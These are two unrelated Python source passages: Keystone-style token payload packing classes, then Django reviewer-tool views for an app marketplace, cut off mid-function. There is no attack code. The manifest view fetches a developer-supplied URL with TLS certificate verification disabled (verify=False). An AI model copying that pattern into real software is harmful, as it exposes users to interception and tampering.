        user_id = cls._convert_or_decode(stored_as_bytes, raw_user)
        methods = auth_plugins.convert_integer_to_method_list(payload[1])
        stored_as_bytes, raw_scope = payload[2]
        scope_id = cls._convert_or_decode(stored_as_bytes, raw_scope)
        # The same slot holds either a project or a domain id; the class
        # version tells us which one it was.
        project_id = None
        domain_id = None
        if cls.version == FederatedProjectScopedPayload.version:
            project_id = scope_id
        elif cls.version == FederatedDomainScopedPayload.version:
            domain_id = scope_id
        group_ids = [cls.unpack_group_id(g) for g in payload[3]]
        stored_as_bytes, raw_idp = payload[4]
        idp_id = cls._convert_or_decode(stored_as_bytes, raw_idp)
        protocol_id = payload[5]
        if isinstance(protocol_id, bytes):
            protocol_id = protocol_id.decode('utf-8')
        expires_at_str = cls._convert_float_to_time_string(payload[6])
        audit_ids = [cls.base64_encode(b) for b in payload[7]]
        return (user_id, methods, None, project_id, domain_id,
                expires_at_str, audit_ids, None, group_ids, idp_id,
                protocol_id, None, None)
class FederatedProjectScopedPayload(FederatedScopedPayload):
    # Version tag only; the packing layout is inherited unchanged from
    # FederatedScopedPayload, which treats the scope slot as a project id
    # when it sees this version.
    version = 5
class FederatedDomainScopedPayload(FederatedScopedPayload):
    # Version tag only; the packing layout is inherited unchanged from
    # FederatedScopedPayload, which treats the scope slot as a domain id
    # when it sees this version.
    version = 6
class OauthScopedPayload(BasePayload):
    """Payload layout for OAuth access-token scoped tokens (version 7)."""

    version = 7

    @classmethod
    def assemble(cls, user_id, methods, system, project_id, domain_id,
                 expires_at, audit_ids, trust_id, federated_group_ids,
                 identity_provider_id, protocol_id, access_token_id,
                 app_cred_id):
        """Pack the oauth-relevant attributes into a compact tuple."""
        packed_user = cls.attempt_convert_uuid_hex_to_bytes(user_id)
        method_int = auth_plugins.convert_method_list_to_integer(methods)
        packed_project = cls.attempt_convert_uuid_hex_to_bytes(project_id)
        expiry = cls._convert_time_string_to_float(expires_at)
        packed_audit = [cls.random_urlsafe_str_to_bytes(a)
                        for a in audit_ids]
        packed_token = cls.attempt_convert_uuid_hex_to_bytes(
            access_token_id)
        return (packed_user, method_int, packed_project, packed_token,
                expiry, packed_audit)

    @classmethod
    def disassemble(cls, payload):
        """Unpack an oauth-scoped payload into the 13-field tuple."""
        stored_as_bytes, raw_user = payload[0]
        user_id = cls._convert_or_decode(stored_as_bytes, raw_user)
        methods = auth_plugins.convert_integer_to_method_list(payload[1])
        stored_as_bytes, raw_project = payload[2]
        project_id = cls._convert_or_decode(stored_as_bytes, raw_project)
        stored_as_bytes, raw_token = payload[3]
        access_token_id = cls._convert_or_decode(stored_as_bytes, raw_token)
        expires_at_str = cls._convert_float_to_time_string(payload[4])
        audit_ids = [cls.base64_encode(b) for b in payload[5]]
        # Everything except project scope and the access token is absent
        # from this payload version.
        return (user_id, methods, None, project_id, None, expires_at_str,
                audit_ids, None, None, None, None, access_token_id, None)
class SystemScopedPayload(BasePayload):
    """Payload layout for system-scoped tokens (version 8)."""

    version = 8

    @classmethod
    def assemble(cls, user_id, methods, system, project_id, domain_id,
                 expires_at, audit_ids, trust_id, federated_group_ids,
                 identity_provider_id, protocol_id, access_token_id,
                 app_cred_id):
        """Pack the system-scope attributes into a compact tuple."""
        packed_user = cls.attempt_convert_uuid_hex_to_bytes(user_id)
        method_int = auth_plugins.convert_method_list_to_integer(methods)
        expiry = cls._convert_time_string_to_float(expires_at)
        packed_audit = [cls.random_urlsafe_str_to_bytes(a)
                        for a in audit_ids]
        # The system value is stored verbatim, not converted.
        return (packed_user, method_int, system, expiry, packed_audit)

    @classmethod
    def disassemble(cls, payload):
        """Unpack a system-scoped payload into the 13-field tuple."""
        stored_as_bytes, raw_user = payload[0]
        user_id = cls._convert_or_decode(stored_as_bytes, raw_user)
        methods = auth_plugins.convert_integer_to_method_list(payload[1])
        system = payload[2]
        expires_at_str = cls._convert_float_to_time_string(payload[3])
        audit_ids = [cls.base64_encode(b) for b in payload[4]]
        return (user_id, methods, system, None, None, expires_at_str,
                audit_ids, None, None, None, None, None, None)
class ApplicationCredentialScopedPayload(BasePayload):
    """Payload layout for application-credential tokens (version 9)."""

    version = 9

    @classmethod
    def assemble(cls, user_id, methods, system, project_id, domain_id,
                 expires_at, audit_ids, trust_id, federated_group_ids,
                 identity_provider_id, protocol_id, access_token_id,
                 app_cred_id):
        """Pack the app-credential attributes into a compact tuple."""
        packed_user = cls.attempt_convert_uuid_hex_to_bytes(user_id)
        method_int = auth_plugins.convert_method_list_to_integer(methods)
        packed_project = cls.attempt_convert_uuid_hex_to_bytes(project_id)
        expiry = cls._convert_time_string_to_float(expires_at)
        packed_audit = [cls.random_urlsafe_str_to_bytes(a)
                        for a in audit_ids]
        packed_app_cred = cls.attempt_convert_uuid_hex_to_bytes(app_cred_id)
        return (packed_user, method_int, packed_project, expiry,
                packed_audit, packed_app_cred)

    @classmethod
    def disassemble(cls, payload):
        """Unpack an app-credential payload into the 13-field tuple."""
        stored_as_bytes, raw_user = payload[0]
        user_id = cls._convert_or_decode(stored_as_bytes, raw_user)
        methods = auth_plugins.convert_integer_to_method_list(payload[1])
        stored_as_bytes, raw_project = payload[2]
        project_id = cls._convert_or_decode(stored_as_bytes, raw_project)
        expires_at_str = cls._convert_float_to_time_string(payload[3])
        audit_ids = [cls.base64_encode(b) for b in payload[4]]
        stored_as_bytes, raw_app_cred = payload[5]
        app_cred_id = cls._convert_or_decode(stored_as_bytes, raw_app_cred)
        return (user_id, methods, None, project_id, None, expires_at_str,
                audit_ids, None, None, None, None, None, app_cred_id)
# Registry of every payload flavor. For the classes visible above, each
# class's ``version`` attribute matches its index in this list (3..9);
# presumably the first three follow the same scheme -- confirm against
# their definitions.
_PAYLOAD_CLASSES = [
    UnscopedPayload,
    DomainScopedPayload,
    ProjectScopedPayload,
    TrustScopedPayload,
    FederatedUnscopedPayload,
    FederatedProjectScopedPayload,
    FederatedDomainScopedPayload,
    OauthScopedPayload,
    SystemScopedPayload,
    ApplicationCredentialScopedPayload,
]
| |
import collections
import datetime
import functools
import HTMLParser
import json
import os
import sys
import traceback
import urllib
from django import http
from django.conf import settings
from django.contrib import messages
from django.core.cache import cache
from django.core.exceptions import PermissionDenied
from django.core.urlresolvers import reverse
from django.db import transaction
from django.db.models import Q
from django.db.models.signals import post_save
from django.shortcuts import get_object_or_404, redirect, render
from django.views.decorators.cache import never_cache
import commonware.log
import jinja2
import requests
import waffle
from appvalidator.constants import PERMISSIONS
from cache_nuggets.lib import Token
from jingo.helpers import urlparams
from rest_framework import viewsets
from rest_framework.exceptions import ParseError
from rest_framework.generics import (CreateAPIView, ListAPIView, UpdateAPIView,
DestroyAPIView)
from rest_framework.permissions import AllowAny, BasePermission
from rest_framework.response import Response
from tower import ugettext as _
from waffle.decorators import waffle_switch
import mkt
from lib.crypto.packaged import SigningError
from mkt.abuse.forms import AppAbuseViewFormSet, WebsiteAbuseViewFormSet
from mkt.abuse.models import AbuseReport
from mkt.access import acl
from mkt.api.authentication import (RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.api.authorization import AnyOf, ByHttpMethod, GroupPermission
from mkt.api.base import CORSMixin, MarketplaceView, SlugOrIdMixin
from mkt.comm.forms import CommAttachmentFormSet
from mkt.constants import MANIFEST_CONTENT_TYPE
from mkt.developers.models import ActivityLog, ActivityLogAttachment
from mkt.ratings.forms import ReviewFlagFormSet
from mkt.ratings.models import Review, ReviewFlag
from mkt.regions.utils import parse_region
from mkt.reviewers.forms import (ApiReviewersSearchForm, ApproveRegionForm,
ModerateLogDetailForm, ModerateLogForm,
MOTDForm, TestedOnFormSet)
from mkt.reviewers.models import (AdditionalReview, CannedResponse,
QUEUE_TARAKO, ReviewerScore)
from mkt.reviewers.serializers import (AdditionalReviewSerializer,
CannedResponseSerializer,
ReviewerAdditionalReviewSerializer,
ReviewerScoreSerializer,
ReviewersESAppSerializer,
ReviewingSerializer)
from mkt.reviewers.utils import (AppsReviewing, log_reviewer_action,
ReviewApp, ReviewersQueuesHelper)
from mkt.search.filters import (ReviewerSearchFormFilter, SearchQueryFilter,
SortingFilter)
from mkt.search.views import SearchView
from mkt.site.decorators import json_view, login_required, permission_required
from mkt.site.helpers import absolutify, product_as_dict
from mkt.site.utils import (days_ago, escape_all, HttpResponseSendFile,
JSONEncoder, paginate, redirect_for_login,
smart_decode)
from mkt.submit.forms import AppFeaturesForm
from mkt.users.models import UserProfile
from mkt.webapps.decorators import app_view, app_view_factory
from mkt.webapps.models import AddonDeviceType, AddonUser, Version, Webapp
from mkt.webapps.signals import version_changed
from mkt.websites.decorators import website_view
from mkt.websites.models import Website
from mkt.zadmin.models import set_config, unmemoized_get_config
from . import forms
# Default number of queue rows shown per page (overridable via ?per_page=).
QUEUE_PER_PAGE = 100
log = commonware.log.getLogger('z.reviewers')
# App-view decorator variant that also resolves soft-deleted webapps.
app_view_with_deleted = app_view_factory(Webapp.with_deleted.all)
def reviewer_required(region=None, moderator=False):
    """Require the requesting user to be a reviewer or admin.

    Access is granted when any of the following holds:

    * the user passes ``acl.check_reviewer`` (i.e. holds Apps:Review),
      optionally for the region given in the *view* kwargs;
    * ``moderator=True`` and the user holds Apps:ModerateReview;
    * the request is a GET and the user holds ReviewerTools:View
      (read-only access).

    May be used bare (``@reviewer_required``) or with arguments
    (``@reviewer_required(moderator=True)``); see the callable check at
    the bottom.
    """
    def decorator(f):
        @login_required
        @functools.wraps(f)
        def wrapper(request, *args, **kw):
            # NOTE(review): the region passed to check_reviewer comes
            # from the view's kwargs, not from this decorator's
            # ``region`` argument -- confirm that is intentional.
            reviewer_perm = acl.check_reviewer(request,
                                               region=kw.get('region'))
            moderator_perm = (moderator and
                              acl.action_allowed(request,
                                                 'Apps', 'ModerateReview'))
            # Read-only access for GET requests.
            view_only = (request.method == 'GET' and
                         acl.action_allowed(request, 'ReviewerTools', 'View'))
            if (reviewer_perm or moderator_perm or view_only):
                return f(request, *args, **kw)
            else:
                raise PermissionDenied
        return wrapper
    # If decorator has no args, and is "paren-less", it's callable.
    if callable(region):
        return decorator(region)
    else:
        return decorator
@reviewer_required(moderator=True)
def route_reviewer(request):
    """Redirect to apps home page if app reviewer."""
    home_url = reverse('reviewers.home')
    return http.HttpResponseRedirect(home_url)
@reviewer_required(moderator=True)
def home(request):
    """Reviewer tools landing page: stats, progress and queue counts."""
    progress, percentage = _progress()
    durations = (('new', _('New Apps (Under 5 days)')),
                 ('med', _('Passable (5 to 10 days)')),
                 ('old', _('Overdue (Over 10 days)')))
    data = context(
        request,
        reviews_total=ActivityLog.objects.total_reviews(webapp=True)[:5],
        reviews_monthly=ActivityLog.objects.monthly_reviews(webapp=True)[:5],
        progress=progress,
        percentage=percentage,
        durations=durations,
        full_reviewer=acl.check_reviewer(request),
    )
    return render(request, 'reviewers/home.html', data)
def queue_counts(request, type=None):
    """Return the number of items in each reviewer queue.

    :param type: optional filter. A string returns the single count for
        that queue name; a list restricts the result to those queue
        names; ``None`` (the default) returns every count.

    Bug fixed: previously there was no ``type`` parameter, so the
    string/list branches below compared against the *builtin* ``type``
    and were dead code. Behavior for existing ``queue_counts(request)``
    callers is unchanged (all counts are returned).
    """
    use_es = waffle.switch_is_active('reviewer-tools-elasticsearch')
    queues_helper = ReviewersQueuesHelper(use_es=use_es)
    counts = {
        'pending': queues_helper.get_pending_queue().count(),
        'rereview': queues_helper.get_rereview_queue().count(),
        'updates': queues_helper.get_updates_queue().count(),
        'escalated': queues_helper.get_escalated_queue().count(),
        'moderated': queues_helper.get_moderated_queue().count(),
        'abuse': queues_helper.get_abuse_queue().count(),
        'abusewebsites': queues_helper.get_abuse_queue_websites().count(),
        'region_cn': Webapp.objects.pending_in_region(mkt.regions.CHN).count(),
        'additional_tarako': (
            AdditionalReview.objects
            .unreviewed(queue=QUEUE_TARAKO, and_approved=True)
            .count()),
    }
    if isinstance(type, basestring):
        return counts[type]
    rv = {}
    for k, v in counts.items():
        if not isinstance(type, list) or k in type:
            rv[k] = v
    return rv
def _progress():
    """Returns unreviewed apps progress.

    Return the number of apps still unreviewed for a given period of time
    and the percentage.
    """
    queues_helper = ReviewersQueuesHelper()
    # Each queue is paired with the date field its age is measured from.
    base_filters = {
        'pending': (queues_helper.get_pending_queue(),
                    'nomination'),
        'rereview': (queues_helper.get_rereview_queue(),
                     'created'),
        'escalated': (queues_helper.get_escalated_queue(),
                      'created'),
        'updates': (queues_helper.get_updates_queue(),
                    'nomination')
    }
    # Django lookup operator + cutoff value per age bucket. Later
    # datetimes compare greater, so 'gt' selects the *newest* entries.
    operators_and_values = {
        'new': ('gt', days_ago(5)),
        'med': ('range', (days_ago(10), days_ago(5))),
        'old': ('lt', days_ago(10)),
        'week': ('gte', days_ago(7))
    }
    types = base_filters.keys()
    progress = {}
    for t in types:
        tmp = {}
        base_query, field = base_filters[t]
        for k in operators_and_values.keys():
            operator, value = operators_and_values[k]
            # Build e.g. {'nomination__gt': <datetime>} dynamically.
            filter_ = {}
            filter_['%s__%s' % (field, operator)] = value
            tmp[k] = base_query.filter(**filter_).count()
        progress[t] = tmp
    def pct(p, t):
        # Return the percent of (p)rogress out of (t)otal.
        return (p / float(t)) * 100 if p > 0 else 0
    # 'week' overlaps the other buckets and is deliberately excluded
    # from the percentage denominator below.
    percentage = {}
    for t in types:
        total = progress[t]['new'] + progress[t]['med'] + progress[t]['old']
        percentage[t] = {}
        for duration in ('new', 'med', 'old'):
            percentage[t][duration] = pct(progress[t][duration], total)
    return (progress, percentage)
def context(request, **kw):
    """Build the base template context shared by all reviewer pages."""
    statuses = {}
    for status_key, status_value in mkt.STATUS_CHOICES_API.items():
        statuses[status_key] = unicode(status_value)
    ctx = {
        'motd': unmemoized_get_config('mkt_reviewers_motd'),
        'queue_counts': queue_counts(request),
        'search_url': reverse('reviewers-search-api'),
        'statuses': statuses,
        'point_types': mkt.REVIEWED_MARKETPLACE,
    }
    ctx.update(kw)
    return ctx
def _review(request, addon, version):
    """Render and process the main review page for one app version.

    On POST, validates the review form (plus attachment, tested-on and
    app-features formsets), applies any reviewer device/feature
    overrides, runs the review action and awards reviewer points. On GET
    (or invalid POST) it builds the full review template context.
    """
    # Guard: developers may not review their own apps unless explicitly
    # allowed by settings or Admin permission.
    if (not settings.ALLOW_SELF_REVIEWS and
        not acl.action_allowed(request, 'Admin', '%') and
        addon.has_author(request.user)):
        messages.warning(request, _('Self-reviews are not allowed.'))
        return redirect(reverse('reviewers.home'))
    # Guard: blocklisted apps require the ReviewEscalated permission.
    if (addon.status == mkt.STATUS_BLOCKED and
        not acl.action_allowed(request, 'Apps', 'ReviewEscalated')):
        messages.warning(
            request, _('Only senior reviewers can review blocklisted apps.'))
        return redirect(reverse('reviewers.home'))
    attachment_formset = CommAttachmentFormSet(data=request.POST or None,
                                               files=request.FILES or None,
                                               prefix='attachment')
    testedon_formset = TestedOnFormSet(data=request.POST or None,
                                       prefix='testedon')
    form = forms.get_review_form(data=request.POST or None,
                                 files=request.FILES or None, request=request,
                                 addon=addon, version=version,
                                 attachment_formset=attachment_formset,
                                 testedon_formset=testedon_formset)
    postdata = request.POST if request.method == 'POST' else None
    all_forms = [form, attachment_formset, testedon_formset]
    if version:
        features_list = [unicode(f) for f in version.features.to_list()]
        appfeatures_form = AppFeaturesForm(data=postdata,
                                           instance=version.features)
        all_forms.append(appfeatures_form)
    else:
        # No version to review: feature data is unavailable.
        appfeatures_form = None
        features_list = None
    queue_type = form.helper.review_type
    redirect_url = reverse('reviewers.apps.queue_%s' % queue_type)
    is_admin = acl.action_allowed(request, 'Apps', 'Edit')
    if request.method == 'POST' and all(f.is_valid() for f in all_forms):
        if form.cleaned_data.get('action') == 'public':
            # Compare reviewer-submitted device types / features against
            # the developer's originals to detect overrides.
            old_types = set(o.id for o in addon.device_types)
            new_types = set(form.cleaned_data.get('device_override'))
            old_features = set(features_list)
            new_features = set(unicode(f) for f
                               in appfeatures_form.instance.to_list())
            if old_types != new_types:
                # The reviewer overrode the device types. We need to not
                # publish this app immediately.
                if addon.publish_type == mkt.PUBLISH_IMMEDIATE:
                    addon.update(publish_type=mkt.PUBLISH_PRIVATE)
                # And update the device types to what the reviewer set.
                AddonDeviceType.objects.filter(addon=addon).delete()
                for device in form.cleaned_data.get('device_override'):
                    addon.addondevicetype_set.create(device_type=device)
                # Log that the reviewer changed the device types.
                added_devices = new_types - old_types
                removed_devices = old_types - new_types
                msg_list = [
                    _(u'Added {0}').format(unicode(mkt.DEVICE_TYPES[d].name))
                    for d in added_devices
                ] + [
                    _(u'Removed {0}').format(unicode(mkt.DEVICE_TYPES[d].name))
                    for d in removed_devices
                ]
                msg = _(u'Device(s) changed by '
                        u'reviewer: {0}').format(', '.join(msg_list))
                log_reviewer_action(addon, request.user, msg,
                                    mkt.LOG.REVIEW_DEVICE_OVERRIDE)
            if old_features != new_features:
                # The reviewer overrode the requirements. We need to not
                # publish this app immediately.
                if addon.publish_type == mkt.PUBLISH_IMMEDIATE:
                    addon.update(publish_type=mkt.PUBLISH_PRIVATE)
                appfeatures_form.save(mark_for_rereview=False)
                # Log that the reviewer changed the minimum requirements.
                added_features = new_features - old_features
                removed_features = old_features - new_features
                fmt = ', '.join(
                    [_(u'Added {0}').format(f) for f in added_features] +
                    [_(u'Removed {0}').format(f) for f in removed_features])
                # L10n: {0} is the list of requirements changes.
                msg = _(u'Requirements changed by reviewer: {0}').format(fmt)
                log_reviewer_action(addon, request.user, msg,
                                    mkt.LOG.REVIEW_FEATURES_OVERRIDE)
        # Run the selected review action; returns truthy when points
        # were awarded.
        score = form.helper.process()
        # Success message.
        if score:
            score = ReviewerScore.objects.filter(user=request.user)[0]
            # L10N: {0} is the type of review. {1} is the points they earned.
            # {2} is the points they now have total.
            success = _(
                u'"{0}" successfully processed (+{1} points, {2} total).'
                .format(unicode(mkt.REVIEWED_CHOICES[score.note_key]),
                        score.score,
                        ReviewerScore.get_total(request.user)))
        else:
            success = _('Review successfully processed.')
        messages.success(request, success)
        return redirect(redirect_url)
    # --- GET (or invalid POST): build the review page context. ---
    canned = CannedResponse.objects.all()
    actions = form.helper.actions.items()
    try:
        if not version:
            raise Version.DoesNotExist
        # Most recent older public version, used for the diff view.
        show_diff = (addon.versions.exclude(id=version.id)
                     .filter(files__isnull=False,
                             created__lt=version.created,
                             files__status=mkt.STATUS_PUBLIC)
                     .latest())
    except Version.DoesNotExist:
        show_diff = None
    # The actions we should show a minimal form from.
    # NOTE(review): the predicate keeps actions where 'minimal' is falsy,
    # which reads as the opposite of the comment above -- confirm.
    actions_minimal = [k for (k, a) in actions if not a.get('minimal')]
    # We only allow the user to check/uncheck files for "pending"
    allow_unchecking_files = form.helper.review_type == "pending"
    versions = (Version.with_deleted.filter(addon=addon)
                .order_by('-created')
                .transform(Version.transformer_activity)
                .transform(Version.transformer))
    product_attrs = {
        'product': json.dumps(
            product_as_dict(request, addon, False, 'reviewer'),
            cls=JSONEncoder),
        'manifest_url': addon.manifest_url,
    }
    pager = paginate(request, versions, 10)
    num_pages = pager.paginator.num_pages
    count = pager.paginator.count
    ctx = context(request, version=version, product=addon, pager=pager,
                  num_pages=num_pages, count=count,
                  form=form, canned=canned, is_admin=is_admin,
                  status_types=mkt.STATUS_CHOICES, show_diff=show_diff,
                  allow_unchecking_files=allow_unchecking_files,
                  actions=actions, actions_minimal=actions_minimal,
                  tab=queue_type, product_attrs=product_attrs,
                  attachment_formset=attachment_formset,
                  appfeatures_form=appfeatures_form,
                  testedon_formset=testedon_formset)
    if features_list is not None:
        ctx['feature_list'] = features_list
    return render(request, 'reviewers/review.html', ctx)
@reviewer_required
@app_view_with_deleted
def app_review(request, addon):
    """Review the latest version of an app inside a DB transaction.

    Signals suppressed while the review runs are re-sent once the
    transaction has committed, so indexing sees consistent data.
    """
    version = addon.latest_version
    resp = None
    try:
        with transaction.atomic():
            resp = _review(request, addon, version)
    except SigningError, exc:
        # Signing failed: surface the error and bounce back to the page.
        messages.error(request, 'Signing Error: %s' % exc)
        return redirect(
            reverse('reviewers.apps.review', args=[addon.app_slug]))
    # We (hopefully) have been avoiding sending send post_save and
    # version_changed signals in the review process till now (_review()
    # uses ReviewHelper which should have done all of its update() calls
    # with _signal=False).
    #
    # Now is a good time to send them: the transaction we were in has been
    # committed, so we know everything is ok. This is important: we need
    # them to index the app or call update_version() if that wasn't done
    # before already.
    if request.method == 'POST':
        post_save.send(sender=Webapp, instance=addon, created=False)
        post_save.send(sender=Version, instance=version, created=False)
        if getattr(addon, 'resend_version_changed_signal', False):
            version_changed.send(sender=addon)
            del addon.resend_version_changed_signal
    if resp:
        return resp
    # NOTE(review): bare ``raise`` only re-raises when an exception is in
    # flight; if _review() simply returned None this raises TypeError
    # (py2) instead -- confirm this fallthrough is intentional.
    raise
# Lightweight rows for queue listings: an app plus the date used for
# sorting, optionally with a per-row action URL.
QueuedApp = collections.namedtuple('QueuedApp', 'app date_field')
# Bug fix: the typename was mistakenly 'QueuedApp', which produced a
# misleading repr and broke pickling round-trips for this type.
ActionableQueuedApp = collections.namedtuple(
    'ActionableQueuedApp', 'app date_field action_url')
def _queue(request, apps, tab, pager_processor=None, date_sort='created',
           template='reviewers/queue.html', data=None, use_es=False):
    """Paginate ``apps`` and render a generic reviewer queue page."""
    pager = paginate(request, apps,
                     request.GET.get('per_page', QUEUE_PER_PAGE))
    ctx = dict(
        addons=pager.object_list,
        pager=pager,
        tab=tab,
        search_form=_get_search_form(request),
        date_sort=date_sort,
        use_es=use_es,
    )
    if data is not None:
        # Caller-supplied extra template context.
        ctx.update(data)
    return render(request, template, context(request, **ctx))
@reviewer_required
def queue_apps(request):
    """Queue of apps awaiting their first review, oldest nomination first."""
    use_es = waffle.switch_is_active('reviewer-tools-elasticsearch')
    queues_helper = ReviewersQueuesHelper(request, use_es=use_es)
    pending = queues_helper.sort(queues_helper.get_pending_queue(),
                                 date_sort='nomination')
    if use_es:
        rows = [QueuedApp(app, app.latest_version.nomination_date)
                for app in pending.execute()]
    else:
        rows = [QueuedApp(app, app.all_versions[0].nomination)
                for app in Webapp.version_and_file_transformer(pending)]
    return _queue(request, rows, 'pending', date_sort='nomination',
                  use_es=use_es)
@reviewer_required
def queue_region(request, region=None):
    """Queue of apps pending approval for one special region."""
    # TODO: Create a landing page that lists all the special regions.
    if region is None:
        raise http.Http404
    region = parse_region(region)
    column = '_geodata__region_%s_nominated' % region.slug
    queues_helper = ReviewersQueuesHelper(request)
    pending = queues_helper.sort(Webapp.objects.pending_in_region(region),
                                 date_sort=column)
    rows = []
    for app in pending:
        action_url = reverse('approve-region', args=[app.id, region.slug])
        rows.append(ActionableQueuedApp(
            app, app.geodata.get_nominated_date(region), action_url))
    return _queue(request, rows, 'region', date_sort=column,
                  template='reviewers/queue_region.html',
                  data={'region': region})
@permission_required([('Apps', 'ReviewTarako')])
def additional_review(request, queue):
    """HTML page for an additional review queue."""
    sort_descending = request.GET.get('order') == 'desc'
    # TODO: Add `.select_related('app')`. Currently it won't load the name.
    reviews = AdditionalReview.objects.unreviewed(
        queue=queue, and_approved=True, descending=sort_descending)
    rows = [
        ActionableQueuedApp(review.app, review.created,
                            reverse('additionalreview-detail',
                                    args=[review.pk]))
        for review in reviews
    ]
    return _queue(request, rows, queue, date_sort='created',
                  template='reviewers/additional_review.html',
                  data={'queue': queue})
@reviewer_required
def queue_rereview(request):
    """Queue of apps flagged for re-review, oldest flag first."""
    use_es = waffle.switch_is_active('reviewer-tools-elasticsearch')
    queues_helper = ReviewersQueuesHelper(request, use_es=use_es)
    queue = queues_helper.sort(queues_helper.get_rereview_queue(),
                               date_sort='created')
    if use_es:
        rows = [QueuedApp(app, app.rereview_date)
                for app in queue.execute()]
    else:
        rows = [QueuedApp(app, app.rereviewqueue_set.all()[0].created)
                for app in queue]
    return _queue(request, rows, 'rereview', date_sort='created',
                  use_es=use_es)
@permission_required([('Apps', 'ReviewEscalated')])
def queue_escalated(request):
    """Queue of apps escalated to senior reviewers, oldest first."""
    use_es = waffle.switch_is_active('reviewer-tools-elasticsearch')
    queues_helper = ReviewersQueuesHelper(request, use_es=use_es)
    queue = queues_helper.sort(queues_helper.get_escalated_queue(),
                               date_sort='created')
    if use_es:
        rows = [QueuedApp(app, app.escalation_date)
                for app in queue.execute()]
    else:
        rows = [QueuedApp(app, app.escalationqueue_set.all()[0].created)
                for app in queue]
    return _queue(request, rows, 'escalated', date_sort='created',
                  use_es=use_es)
@reviewer_required
def queue_updates(request):
    """Queue of updates to already-approved apps."""
    use_es = waffle.switch_is_active('reviewer-tools-elasticsearch')
    queues_helper = ReviewersQueuesHelper(request, use_es=use_es)
    queue = queues_helper.sort(queues_helper.get_updates_queue(),
                               date_sort='nomination')
    if use_es:
        rows = [QueuedApp(app, app.latest_version.nomination_date)
                for app in queue.execute()]
    else:
        rows = [QueuedApp(app, app.all_versions[0].nomination)
                for app in Webapp.version_and_file_transformer(queue)]
    return _queue(request, rows, 'updates', date_sort='nomination',
                  use_es=use_es)
@permission_required([('Apps', 'ModerateReview')])
def queue_moderated(request):
    """Queue for reviewing app reviews."""
    queues_helper = ReviewersQueuesHelper(request)
    page = paginate(request, queues_helper.get_moderated_queue(),
                    per_page=20)
    reviews_formset = ReviewFlagFormSet(request.POST or None,
                                        queryset=page.object_list,
                                        request=request)
    if reviews_formset.is_valid():
        reviews_formset.save()
        return redirect(reverse('reviewers.apps.queue_moderated'))
    flags = dict(ReviewFlag.FLAGS)
    return render(request, 'reviewers/queue.html',
                  context(request, reviews_formset=reviews_formset,
                          tab='moderated', page=page, flags=flags))
@permission_required([('Apps', 'ReadAbuse')])
def queue_abuse(request):
    """Queue for reviewing abuse reports for apps."""
    queues_helper = ReviewersQueuesHelper(request)
    page = paginate(request, queues_helper.get_abuse_queue(), per_page=20)
    abuse_formset = AppAbuseViewFormSet(request.POST or None,
                                        queryset=page.object_list,
                                        request=request)
    if abuse_formset.is_valid():
        abuse_formset.save()
        return redirect(reverse('reviewers.apps.queue_abuse'))
    return render(request, 'reviewers/queue.html',
                  context(request, abuse_formset=abuse_formset,
                          tab='abuse', page=page))
@permission_required([('Websites', 'ReadAbuse')])
def queue_abuse_websites(request):
    """Queue for reviewing abuse reports for websites."""
    queues_helper = ReviewersQueuesHelper(request)
    page = paginate(request, queues_helper.get_abuse_queue_websites(),
                    per_page=20)
    abuse_formset = WebsiteAbuseViewFormSet(request.POST or None,
                                            queryset=page.object_list,
                                            request=request)
    if abuse_formset.is_valid():
        abuse_formset.save()
        return redirect(reverse('reviewers.websites.queue_abuse'))
    return render(request, 'reviewers/queue.html',
                  context(request, abuse_formset=abuse_formset,
                          tab='abusewebsites', page=page))
def _get_search_form(request):
    """Bind the reviewer search form to the whitelisted GET params."""
    blank_form = ApiReviewersSearchForm()
    allowed = [field.name for field in
               blank_form.visible_fields() + blank_form.hidden_fields()]
    bound_data = dict((key, value) for key, value in request.GET.items()
                      if key in allowed)
    return ApiReviewersSearchForm(bound_data or None)
@reviewer_required
def logs(request):
    """Review-log listing with optional date-range and search filters."""
    data = request.GET.copy()
    if not data.get('start') and not data.get('end'):
        # Default to the last 30 days when no range is given.
        today = datetime.date.today()
        data['start'] = today - datetime.timedelta(days=30)
    form = forms.ReviewLogForm(data)
    approvals = ActivityLog.objects.review_queue(webapp=True)
    if form.is_valid():
        cleaned = form.cleaned_data
        if cleaned.get('start'):
            approvals = approvals.filter(created__gte=cleaned['start'])
        if cleaned.get('end'):
            approvals = approvals.filter(created__lt=cleaned['end'])
        term = cleaned.get('search')
        if term:
            approvals = approvals.filter(
                Q(commentlog__comments__icontains=term) |
                Q(applog__addon__name__localized_string__icontains=term) |
                Q(applog__addon__app_slug__icontains=term) |
                Q(user__display_name__icontains=term) |
                Q(user__email__icontains=term)).distinct()
    pager = paginate(request, approvals, 50)
    ctx = context(request, form=form, pager=pager,
                  ACTION_DICT=mkt.LOG_BY_ID, tab='logs')
    return render(request, 'reviewers/logs.html', ctx)
@reviewer_required
def motd(request):
    """Show, and for authorized users edit, the reviewers' MOTD."""
    current_motd = unmemoized_get_config('mkt_reviewers_motd')
    form = None
    if acl.action_allowed(request, 'AppReviewerMOTD', 'Edit'):
        form = MOTDForm(request.POST or None,
                        initial={'motd': current_motd})
    if form and request.method == 'POST' and form.is_valid():
        set_config(u'mkt_reviewers_motd', form.cleaned_data['motd'])
        messages.success(request, _('Changes successfully saved.'))
        return redirect(reverse('reviewers.apps.motd'))
    return render(request, 'reviewers/motd.html',
                  context(request, form=form))
def _get_permissions(manifest):
    """Classify each manifest permission as 'web', 'priv' or 'cert'."""
    permissions = {}
    declared = manifest.get('permissions', {})
    for name in declared.keys():
        if name in PERMISSIONS['privileged']:
            perm_type = 'priv'
        elif name in PERMISSIONS['certified']:
            perm_type = 'cert'
        else:
            perm_type = 'web'
        permissions[name] = {
            'type': perm_type,
            'description': declared[name].get('description'),
        }
    return permissions
def _get_manifest_json(addon):
    """Return the manifest JSON of the latest version's first file."""
    latest_file = addon.versions.latest().all_files[0]
    return addon.get_manifest_json(latest_file)
@permission_required([('AppLookup', 'View'), ('Apps', 'Review')])
@app_view_with_deleted
@json_view
def app_view_manifest(request, addon):
    """Return an app's manifest (re-indented), headers and permissions.

    Packaged apps read the manifest from the package; hosted apps fetch
    it live from ``addon.manifest_url``.
    """
    headers = {}
    manifest = {}
    success = False
    if addon.is_packaged:
        manifest = _get_manifest_json(addon)
        content = json.dumps(manifest, indent=4)
        success = True
    else:  # Show the hosted manifest_url.
        content, headers = u'', {}
        if addon.manifest_url:
            try:
                req = requests.get(
                    addon.manifest_url, verify=False,
                    headers={'User-Agent': settings.MARKETPLACE_USER_AGENT})
                content, headers = req.content, req.headers
                success = True
            except Exception:
                content = u''.join(traceback.format_exception(*sys.exc_info()))
        else:
